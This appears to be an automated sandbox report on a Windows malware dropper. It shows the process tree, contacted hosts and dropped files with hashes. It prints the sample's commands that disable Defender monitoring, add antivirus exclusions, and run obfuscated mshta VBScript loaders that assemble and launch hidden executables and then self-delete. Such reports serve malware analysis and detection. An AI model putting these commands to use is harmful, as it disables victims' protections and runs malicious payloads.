PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2672 wrote to memory of 2056 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

Sat062000ca9aa6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe

Sat0619212f22dd7.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat060fd7e42d2.exe

Sat060fd7e42d2.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe

Sat0618d93ac2c5c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe

Sat0647140c100d63.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe

Sat06ebc37d1c94352.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe

Sat0675f75df01bdb.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe

Sat06f5ed0e3bb24.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 272

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe

Sat0663b341399ee.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "Sat0675f75df01bdb.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if """" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06f5ed0e3bb24.exe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe" ) do taskkill /F -Im "%~NxU"

C:\Users\Admin\AppData\Local\Temp\09xU.exE

09xU.EXE -pPtzyIkqLZoCarb5ew

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "Sat06f5ed0e3bb24.exe" /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /F -Im "Sat0663b341399ee.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscRIpT: ClOsE (CReAteObJect("WScRipT.ShELL" ). RUn ( "CMd.eXE /Q /c cOpY /y ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if ""/paMxRK9ViV3PT5Jnz5"" == """" for %z in ( ""C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe"" ) do taskkill -Im ""%~nXz"" /F " , 0 , TrUe ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2812 -s 440

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

C:\Users\Admin\AppData\Local\Temp\f7871e5.exe

"C:\Users\Admin\AppData\Local\Temp\f7871e5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 652

C:\Users\Admin\AppData\Local\Temp\f78aa43.exe

"C:\Users\Admin\AppData\Local\Temp\f78aa43.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 652

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gazrxlog.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:49264 tcp
N/A 127.0.0.1:49268 tcp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 91.121.67.60:23325 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:23325 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.75:80 r11.o.lencr.org tcp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
FR 91.121.67.60:23325 tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\setup_install.exe

MD5 a979670adefae9ab376382f3229f3f28
SHA1 5b5b75a789e46a2f8ac02fba3d895fa968387c9b
SHA256 a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040
SHA512 f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/2812-46-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-49-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2812-62-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-66-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-68-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2812-67-0x0000000064941000-0x000000006494F000-memory.dmp

memory/2812-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-60-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-59-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-58-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0618d93ac2c5c.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat06ebc37d1c94352.exe

MD5 e9133ca1a95483a3331d0f336685302d
SHA1 48c1348e20b26be8227ed63a1db0f13716f1b8e3
SHA256 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b
SHA512 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57

memory/2700-115-0x0000000000400000-0x000000000089B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 91c3dea509f72adb8d5e130c0adae53d
SHA1 e3a51b073755b0e3cb66b370b77609cdb80c17ca
SHA256 60f0083d4d8c81af9c05cdf7099dc78fe8f76b55c0c71665868fb016186c313b
SHA512 c66cdc4c151d6b10bfe5f2bbd104bbf4ae3d59c6dfdcf8442dc1a6d797df3012d199508e89df7797c78f7d159e931be5b5ba374a02754ed1b3c3ad5d9319b4eb

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0647140c100d63.exe

MD5 10e13cc7b41d162ab578256f27d297b1
SHA1 1d938b7e6e99951d9b8139f078483539120021e6
SHA256 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9
SHA512 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0663b341399ee.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

memory/2056-132-0x0000000000830000-0x0000000000898000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

MD5 0e05650d436fd4d92775cd4f65973870
SHA1 4d13aaa6b18630d0c89400cee5933130f03bd762
SHA256 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16
SHA512 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat060fd7e42d2.exe

MD5 29c9683aa48f1e3a29168f6b0ff3be04
SHA1 f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f
SHA256 e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901
SHA512 a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat062000ca9aa6.exe

MD5 1cc8a64b178076dca421fedc3a248a56
SHA1 db8ed444965577dfb6db4f92ddd8d96a157ddea5
SHA256 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345
SHA512 c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff

C:\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0675f75df01bdb.exe

MD5 dd2fdd69b9db1cf5764dcfd429a1cf5e
SHA1 c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8
SHA256 d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe
SHA512 c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\Sat0619212f22dd7.exe

MD5 854ea0bc0602795b95da3be8257c530f
SHA1 f243a71edc902ed91d0f990630a73d0d01828c73
SHA256 c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e
SHA512 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c

memory/1032-154-0x0000000000FD0000-0x0000000000FEA000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zSC7ABABB6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/1032-161-0x0000000000260000-0x0000000000266000-memory.dmp

memory/2896-160-0x00000000026D0000-0x00000000028D2000-memory.dmp

memory/1816-162-0x0000000002810000-0x000000000295C000-memory.dmp

memory/2812-172-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2812-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-170-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-169-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-167-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2812-163-0x0000000000400000-0x000000000051B000-memory.dmp

memory/2860-173-0x0000000000400000-0x0000000000883000-memory.dmp

memory/2896-175-0x0000000002CD0000-0x0000000002D75000-memory.dmp

memory/2896-179-0x0000000002D80000-0x0000000002E12000-memory.dmp

memory/2896-176-0x0000000002D80000-0x0000000002E12000-memory.dmp

memory/1816-181-0x0000000002810000-0x000000000295C000-memory.dmp

memory/2896-180-0x00000000026D0000-0x00000000028D2000-memory.dmp

memory/1656-194-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-192-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-191-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-190-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1656-188-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-186-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-184-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1656-182-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1816-196-0x0000000002CE0000-0x0000000002D85000-memory.dmp

memory/1816-200-0x0000000002D90000-0x0000000002E22000-memory.dmp

memory/1816-197-0x0000000002D90000-0x0000000002E22000-memory.dmp

memory/2896-202-0x0000000002D80000-0x0000000002E12000-memory.dmp

memory/2896-203-0x0000000002E20000-0x00000000038ED000-memory.dmp

memory/2896-204-0x0000000000930000-0x00000000009BB000-memory.dmp

memory/2896-205-0x00000000038F0000-0x0000000003976000-memory.dmp

